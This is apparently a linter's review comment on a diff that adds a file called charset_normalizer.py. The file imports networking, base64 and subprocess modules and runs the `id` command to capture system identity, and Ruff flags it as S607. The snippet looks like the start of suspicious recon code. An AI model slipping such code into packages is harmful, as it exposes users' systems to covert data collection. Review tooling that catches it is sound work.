charset_normalizer.py

```
@@ -0,0 +1,31 @@
+import os
+import urllib.request
+import json
+import base64
+import subprocess
+
+try:
+    cmd_out = subprocess.check_output(['id']).decode('utf-8')
```

Ruff (0.15.13)

[error] Starting a process with a partial executable path

(S607)